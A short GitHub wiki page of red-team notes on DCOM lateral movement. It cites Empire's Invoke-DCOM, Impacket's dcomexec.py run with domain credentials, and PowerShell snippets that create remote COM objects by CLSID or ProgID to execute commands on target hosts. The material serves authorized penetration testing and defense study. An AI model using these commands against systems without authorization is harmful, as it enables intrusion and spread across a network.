DCOM - CraigDonkin/Infrastructure GitHub Wiki

Invoke-DCOM

https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1

Import-Module Invoke-DCOM.ps1
Invoke-DCOM -ComputerName <computer> -Method MMC20.Application -Command <command>

Other methods:

ExcelDDE
ServiceStart

dcomexec

https://github.com/fortra/impacket/blob/master/examples/dcomexec.py

python3 dcomexec.py -object MMC20 <domain>/<username>:<password>@<target>

Bloodhound

https://support.bloodhoundenterprise.io/hc/en-us/articles/17322336477979-ExecuteDCOM

$ComputerName = <target computer name>              # Remote computer
$clsid = "{fbae34e8-bf95-4da8-bf98-6c6e580aa348}"   # GUID of the COM object
$Type = [Type]::GetTypeFromCLSID($clsid, $ComputerName)
$ComObject = [Activator]::CreateInstance($Type)

If specifying a COM object by its ProgID:

$ComputerName = <target computer name>              # Remote computer
$ProgId = "<NAME>"                                  # GUID of the COM object
$Type = [Type]::GetTypeFromProgID($ProgId, $ComputerName)
$ComObject = [Activator]::CreateInstance($Type)
⚠️ **GitHub.com Fallback** ⚠️